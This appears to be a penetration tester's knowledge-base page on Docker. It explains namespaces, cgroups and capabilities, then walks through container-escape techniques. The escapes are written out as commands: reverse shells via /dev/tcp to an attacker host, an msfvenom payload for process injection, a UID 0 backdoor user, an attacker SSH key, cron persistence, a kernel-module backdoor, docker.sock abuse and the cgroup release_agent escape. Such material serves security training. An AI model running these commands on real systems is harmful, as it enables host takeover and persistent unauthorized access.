# Docker

## Theory

[Docker](https://docs.docker.com/manuals/) containers are not a security technology by themselves, but rather a packaging and deployment mechanism that leverages existing Linux kernel security features. Docker security relies on three major mechanisms that provide process isolation and resource control: namespaces, `cgroups`, and capabilities.

Docker's security model assumes proper configuration of these mechanisms. Misconfigurations in any layer can lead to container escape and host compromise.

### Namespaces: Process-Level Isolation

[Namespaces](https://man7.org/linux/man-pages/man7/namespaces.7.html) are a Linux kernel feature that partitions kernel resources so that one set of processes sees one set of resources while another set of processes sees a different set of resources. Docker leverages six types of namespaces:

* **PID Namespace**: Isolates process IDs. Processes in a container see only processes within the same container, with the main process appearing as PID 1.
* **Network Namespace**: Isolates network interfaces, routing tables, and firewall rules. Each container gets its own network stack.
* **Mount Namespace**: Isolates filesystem mount points. Containers see only their designated filesystem view.
* **User Namespace**: Maps container user IDs to different host user IDs (not enabled by default in Docker).
* **UTS Namespace**: Isolates hostname and domain name. Each container can have its own hostname.
* **IPC Namespace**: Isolates inter-process communication resources like shared memory and semaphores.
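The kernel exposes the namespaces of each process as symlinks under `/proc/<pid>/ns/`, so this isolation can be observed from a shell. The following is a minimal sketch, assuming a Linux `/proc` filesystem; `ns_id` and `shares_ns` are illustrative helper names, not part of Docker or any standard tool.

```bash
# ns_id <pid> <type>: print the namespace identifier of a process,
# in the kernel's "type:[inode]" form.
ns_id() {
  readlink "/proc/$1/ns/$2"
}

# shares_ns <pid_a> <pid_b> <type>: succeed (exit 0) when both processes
# live in the same namespace of the given type (pid, net, mnt, user, uts, ipc).
# Returns 2 when one of the namespace links cannot be read.
shares_ns() {
  local a b
  a=$(ns_id "$1" "$3") || return 2
  b=$(ns_id "$2" "$3") || return 2
  [ "$a" = "$b" ]
}
```

For example, `shares_ns self 1 net && echo "same network namespace as PID 1"`. Reading the links of another process generally requires sufficient privileges over it.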

### Control Groups (`cgroups`): Resource Limitation and Monitoring

[`cgroups`](https://man7.org/linux/man-pages/man7/cgroups.7.html) are a Linux kernel feature that limits and isolates resource usage (CPU, memory, disk I/O, network) of a collection of processes. Docker uses `cgroups` to:

* **CPU Control**: Limit CPU usage and set scheduling priorities
* **Memory Control**: Limit RAM usage and prevent memory bombs
* **Block I/O Control**: Limit disk read/write operations
* **Network Control**: Limit network bandwidth (with additional tools)
* **Device Control**: Control access to devices like `/dev/sda`
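These limits are visible from inside a container through the cgroup filesystem. The sketch below reads the memory limit, assuming the usual `/sys/fs/cgroup` mount point and the standard file names (`memory.max` on cgroup v2, `memory/memory.limit_in_bytes` on cgroup v1); `cgroup_mem_limit` is a hypothetical helper name.

```bash
# cgroup_mem_limit [cgroup_root]: print the memory limit applied to the
# current cgroup. cgroup_root defaults to /sys/fs/cgroup.
cgroup_mem_limit() {
  local root="${1:-/sys/fs/cgroup}"
  if [ -r "$root/memory.max" ]; then
    # cgroup v2: a byte count, or "max" when unlimited
    cat "$root/memory.max"
  elif [ -r "$root/memory/memory.limit_in_bytes" ]; then
    # cgroup v1: a byte count (a very large number when unlimited)
    cat "$root/memory/memory.limit_in_bytes"
  else
    echo "unknown"
    return 1
  fi
}
```

In a container started with a memory limit (for instance `docker run --memory=256m ...`), calling `cgroup_mem_limit` should print that limit in bytes.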

### Capabilities: Privilege Control

Traditional Unix systems have a binary privilege model: root (UID 0) has all privileges, while non-root users have limited privileges. [Linux capabilities](https://man7.org/linux/man-pages/man7/capabilities.7.html) break down root privileges into distinct units, allowing fine control over what privileged operations a process can perform.

Docker containers run with a restricted set of capabilities by default. Dangerous ones that are dropped include:

* `CAP_SYS_ADMIN` (system administration)
* `CAP_SYS_MODULE` (kernel module loading)
* `CAP_SYS_PTRACE` (process tracing)
* `CAP_NET_ADMIN` (network configuration tasks)

Some sensitive capabilities remain in the default set:

* `CAP_DAC_OVERRIDE` (bypass the permissions set by file owners)
* `CAP_SETUID`, `CAP_SETGID` (change the process's own user or group IDs)

***

## Practice

In real engagements, a Docker container escape is usually needed after obtaining a foothold inside a running container. These escape techniques allow pivoting to the host running the container and thus gaining privileges.

**Rapid Security Assessment**

When landing on a host running Docker containers, the following command (which requires access to the Docker CLI and `jq`) gathers information that can be useful for privilege escalation.

```bash
# Security check for running containers
docker ps -q | xargs docker inspect | jq '.[] | {
  Name: .Name,
  Privileged: .HostConfig.Privileged,
  Capabilities: .HostConfig.CapAdd,
  Mounts: [.Mounts[] | select(.Type=="bind") | .Source],
  PidMode: .HostConfig.PidMode,
  NetworkMode: .HostConfig.NetworkMode
}'
```

### Capabilities Abuse

Docker drops many dangerous capabilities by default, but **adding back a single high-risk capability can fully break isolation**.

**High-risk capabilities include:**

* `CAP_SYS_ADMIN` (most dangerous)
* `CAP_SYS_PTRACE`
* `CAP_SYS_MODULE`
* `CAP_DAC_OVERRIDE`
* `CAP_NET_ADMIN`
* `CAP_SETUID`, `CAP_SETGID`

Privileged containers (`--privileged`) disable most security features, granting nearly all capabilities and device access. They provide multiple escape vectors.

#### Detection

```bash
# If capsh is available in the container
capsh --print
capsh --decode=$(grep CapEff /proc/self/status | awk '{print $2}')

# Manual way (requires capsh on the attack machine)
cat /proc/self/status | grep Cap
capsh --decode=<CapEff_value>
```

If `CapEff` is close to `0000003fffffffff` (or `000001ffffffffff` on recent kernels, which define more capabilities), the container is effectively **privileged**.
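When `capsh` is not available anywhere, the mask can still be checked by hand, since each capability is one bit of the hexadecimal value. The sketch below tests only the high-risk capabilities listed above, using the bit positions from `linux/capability.h`; `RISKY_CAPS` and `risky_caps` are illustrative names.

```bash
# Bit positions (from linux/capability.h) of the capabilities listed above as high-risk.
RISKY_CAPS="1:CAP_DAC_OVERRIDE 6:CAP_SETGID 7:CAP_SETUID 12:CAP_NET_ADMIN 16:CAP_SYS_MODULE 19:CAP_SYS_PTRACE 21:CAP_SYS_ADMIN"

# risky_caps <hex_mask>: print every high-risk capability whose bit is set
# in a CapEff-style hexadecimal mask (without the 0x prefix).
risky_caps() {
  local mask entry bit name
  mask=$((0x$1))
  for entry in $RISKY_CAPS; do
    bit=${entry%%:*}
    name=${entry#*:}
    if [ $(( (mask >> bit) & 1 )) -eq 1 ]; then
      echo "$name"
    fi
  done
}
```

Inside a container it can be fed directly from `/proc`: `risky_caps "$(awk '/^CapEff:/ {print $2}' /proc/self/status)"`. With Docker's default mask `00000000a80425fb`, only `CAP_DAC_OVERRIDE`, `CAP_SETGID` and `CAP_SETUID` are reported.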

#### `CAP_SYS_ADMIN`

`CAP_SYS_ADMIN` allows mounting filesystems, creating namespaces, and accessing devices. In a Docker escape context, this means the host filesystem can be mounted directly into the container.

**Direct disk mount:**

<pre class="language-bash"><code class="lang-bash"><strong># Requires the host disk (e.g. /dev/sda1) to be exposed inside the container
</strong><strong>mkdir /mnt/host
</strong>mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash
</code></pre>

This is not guaranteed with `CAP_SYS_ADMIN` alone: the host block device must also be visible and accessible inside the container.

**Mount namespace manipulation:**

```bash
# Create a new mount namespace, then mount inside it
unshare -m
mount -t proc proc /proc
mount /dev/sda1 /mnt
```

Generally possible with `CAP_SYS_ADMIN` (unless AppArmor or seccomp blocks `mount`), but it does **not** equal a host escape by itself. This gives **filesystem control inside the container**, not the host.

| Condition                                 | Can mount host FS? |
| ----------------------------------------- | ------------------ |
| CAP\_SYS\_ADMIN only                      | No                 |
| CAP\_SYS\_ADMIN + privileged              | Yes                |
| CAP\_SYS\_ADMIN + /dev mount              | Yes                |
| CAP\_SYS\_ADMIN + docker.sock             | Yes                |
| CAP\_SYS\_ADMIN + correct Docker defaults | No                 |

#### `CAP_SYS_PTRACE`

Combined with `--pid=host`, `CAP_SYS_PTRACE` allows attaching to host processes and executing code in their context. The **`--pid=host`** flag makes a container operate within the same process namespace as the host system.

**Host-level code execution** (requires gdb)**:**

```bash
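# Relax Yama ptrace restrictions (only works if /proc/sys is writable, e.g. in a privileged container)
echo 0 > /proc/sys/kernel/yama/ptrace_scope
# Option 1: spawn a shell from the host's PID 1
gdb -p 1 -batch -ex "call system(\"/bin/bash\")"
# Option 2: reverse shell from the host's PID 1 (wrapped in bash -c because system() uses /bin/sh)
gdb -p 1 -batch -ex "call system(\"bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1'\")"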
```

**Process injection:**

```bash
# Create the payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<attacker_ip> LPORT=<attacker_port> -f raw -o payload.bin

# Open a listener on the attack machine before injecting
pwncat-cs -lp <attacker_port>

# Upload the payload and the injector to the container
# In the container, identify a host process running as root to target for the callback
ps aux | grep root

# Inject the payload into the process
./injector <root-process-pid> payload.bin
```

The injector I use:

{% embed url="<https://github.com/gaffe23/linux-inject>" %}

#### `CAP_SYS_MODULE`

`CAP_SYS_MODULE` allows loading arbitrary kernel modules. Because containers share the host kernel, this leads to **instant host compromise**.

```bash
insmod backdoor.ko
```

The kernel module backdoor I use:

{% embed url="<https://github.com/matheuspd/Linux-Kernel-Module-Backdoor-Demonstration>" %}

#### `CAP_DAC_OVERRIDE`

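`CAP_DAC_OVERRIDE` allows bypassing file permission checks. Abusing it against the host requires the host filesystem to be mounted in the container.

```bash
# If the host root is mounted at /host, either chroot into it...
chroot /host /bin/bash

# ...or edit the host files directly from the container

# Create a backdoor user with UID 0
echo "backdoor:x:0:0::/root:/bin/bash" >> /host/etc/passwd
# Single quotes keep the shell from expanding the $ signs of the hash
echo 'backdoor:$6$<salt>$<hash>:::::::' >> /host/etc/shadow

# Install an SSH key
mkdir -p /host/root/.ssh
echo "ssh-rsa AAAAB3... attacker" >> /host/root/.ssh/authorized_keys

# Persistent access via cron (cron runs jobs with /bin/sh, so the bashisms are wrapped in bash -c)
echo "* * * * * root bash -c 'bash -i >& /dev/tcp/<attacker_ip>/<attacker_port> 0>&1'" >> /host/etc/crontab
```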

### Namespaces Abuse

If a container shares namespaces with the host or gains the ability to enter them, isolation collapses.

**Dangerous namespace configurations:**

* `--pid=host`
* `--net=host`
* `--ipc=host`
* Writable `/proc`, `/sys`
* `nsenter` available

#### Detection

```bash
# Inside a container
ls -l /proc/1/ns

# Outside a container
docker inspect <container> | jq '.[0].HostConfig'
```

Look for:

* `PidMode: "host"`
* `NetworkMode: "host"`
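From inside a container, where `docker inspect` is not available, a shared PID namespace can often be recognized by the presence of kernel threads. The sketch below is a heuristic only, assuming a standard Linux host where PID 2 is `kthreadd`; `sees_host_pids` is a hypothetical helper name.

```bash
# sees_host_pids [proc_root]: succeed when kernel threads are visible,
# which suggests the PID namespace is shared with the host.
# proc_root defaults to /proc.
sees_host_pids() {
  local proc="${1:-/proc}"
  # On a Linux host, PID 2 is the kernel thread daemon "kthreadd".
  # Inside a private PID namespace, kernel threads are not visible.
  [ -r "$proc/2/comm" ] && [ "$(cat "$proc/2/comm")" = "kthreadd" ]
}
```

Usage: `sees_host_pids && echo "PID namespace looks shared with the host"`.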

#### PID Namespace Escape (`--pid=host`)

Host processes are visible and targetable. Entering their namespaces with `nsenter` also requires `CAP_SYS_ADMIN`.

```bash
nsenter -t 1 -m -u -i -n -p /bin/bash
```

You are now **inside the host namespaces**.

#### `/proc` Abuse

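`/proc` exposes kernel and process internals. When the container shares the host PID namespace, `/proc/1/root` points to the host's root filesystem (reading it requires sufficient privileges over PID 1).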

```bash
ls /proc/1/root
chroot /proc/1/root /bin/bash
```

This is one of the **simplest real-world escapes**.

#### Mount Namespace Abuse

Writable mount namespaces allow filesystem manipulation.

```bash
# Show how the root filesystem is mounted
mount | grep ' / '
mount -o remount,rw /
```
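Before attempting the remount, it helps to know whether the root filesystem is read-only in the first place (for example when the container was started with `--read-only`). The sketch below reads the first mount option of `/`, which the kernel reports as `ro` or `rw`; `root_mount_mode` is an illustrative name and the function assumes the standard `/proc/mounts` layout.

```bash
# root_mount_mode [mounts_file]: print "ro" or "rw" for the root filesystem.
# mounts_file defaults to /proc/mounts (fields: device, mount point, type, options).
root_mount_mode() {
  local file="${1:-/proc/mounts}"
  # Keep the last entry mounted on "/", since later mounts shadow earlier ones.
  awk '$2 == "/" { split($4, opts, ","); mode = opts[1] } END { print mode }' "$file"
}
```

Usage: `[ "$(root_mount_mode)" = "ro" ] && echo "root filesystem is read-only"`.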

#### Docker Socket Namespace Escape

The Docker socket exposes the Docker Engine API. If it is mounted inside a container and the Docker CLI is available, you can interact with other containers, spin up new ones, and more.

```bash
# Search for docker.sock, could be somewhere else
ls -la /var/run/docker.sock

# Check if the Docker Engine API is reachable
docker ps
```
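Since the socket may be mounted under another path, a small helper can test several candidates at once. This is a minimal sketch: `find_docker_socks` is a hypothetical name, and the default path is only the most common location.

```bash
# find_docker_socks [path...]: print each candidate path that is a Unix socket
# writable by the current user. Defaults to /var/run/docker.sock.
find_docker_socks() {
  [ "$#" -gt 0 ] || set -- /var/run/docker.sock
  local p
  for p in "$@"; do
    if [ -S "$p" ] && [ -w "$p" ]; then
      echo "$p"
    fi
  done
}
```

If the Docker CLI is missing but `curl` is present, the API can still be queried through the socket, for example `curl --unix-socket /var/run/docker.sock http://localhost/containers/json`.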

Spin up a new container with a host bind mount and privileges:

```bash
docker run -it --privileged -v /:/mnt alpine chroot /mnt /bin/sh
```

This is the **most common container escape in the wild**.

### `cgroups` Abuse

Cgroups limit resources, but misconfigured cgroups can be abused to **execute code on the host**. This attack is **independent of Docker** and targets the Linux kernel directly.

#### Detection

```bash
mount | grep cgroup
ls /sys/fs/cgroup
```

Writable cgroup mounts are a red flag.
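The cgroup version also matters, because the `release_agent` mechanism only exists in cgroup v1. The sketch below guesses the version from the format of `/proc/self/cgroup`; `cgroup_version` is an illustrative name, and hybrid setups are reported as `v1` because v1 controllers are still present.

```bash
# cgroup_version [cgroup_file]: print "v2" for a pure unified hierarchy,
# "v1" otherwise. cgroup_file defaults to /proc/self/cgroup.
cgroup_version() {
  local file="${1:-/proc/self/cgroup}"
  [ -r "$file" ] || return 1
  # cgroup v2 entries have the form "0::/path"; v1 entries name a controller,
  # e.g. "4:memory:/docker/<id>".
  if grep -qv '^0::' "$file"; then
    echo "v1"
  else
    echo "v2"
  fi
}
```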

#### cgroup `release_agent` Escape

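When the last process in a cgroup with `notify_on_release` enabled exits, the kernel executes the user-defined `release_agent` binary **on the host**, as root. This is a cgroup v1 feature, and setting it up requires `CAP_SYS_ADMIN`.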

```bash
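# Mount a cgroup v1 hierarchy (here the memory controller)
mkdir -p /tmp/cgrp
mount -t cgroup -o memory cgroup /tmp/cgrp
mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
# release_agent must be a path that is valid on the host
echo "/bin/bash" > /tmp/cgrp/release_agent
# Put a short-lived process in the cgroup: when it exits, the cgroup empties and the agent fires
sh -c 'echo $$ > /tmp/cgrp/x/cgroup.procs'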
```

This results in **host command execution**.
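Because the `release_agent` path is resolved on the host, a script written inside the container has to be referenced by its host-side location. With the overlay storage driver, that location can usually be derived from the `upperdir=` option of the container's root mount. The sketch below assumes an overlay root filesystem; `overlay_upperdir` is a hypothetical helper name.

```bash
# overlay_upperdir [mounts_file]: print the host-side directory backing the
# container's writable layer, taken from the "upperdir=" option of the root
# overlay mount. mounts_file defaults to /proc/mounts.
overlay_upperdir() {
  local file="${1:-/proc/mounts}"
  awk '$2 == "/" && $3 == "overlay" { print $4 }' "$file" |
    sed -n 's/.*upperdir=\([^,]*\).*/\1/p'
}
```

A script placed at `/cmd` in the container (an illustrative path) could then be registered with `echo "$(overlay_upperdir)/cmd" > /tmp/cgrp/release_agent`.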

## Resources

{% embed url="<https://blog.nody.cc/posts/container-breakouts-part3/>" %}

{% embed url="<https://blog.nody.cc/posts/container-breakouts-part2/>" %}

{% embed url="<https://blog.nody.cc/posts/container-breakouts-part1/>" %}

{% embed url="<https://redfoxsec.com/blog/exploiting-excessive-container-capabilities/>" %}

{% embed url="<https://book.hacktricks.wiki/en/network-services-pentesting/2375-pentesting-docker.html#docker-basics>" %}


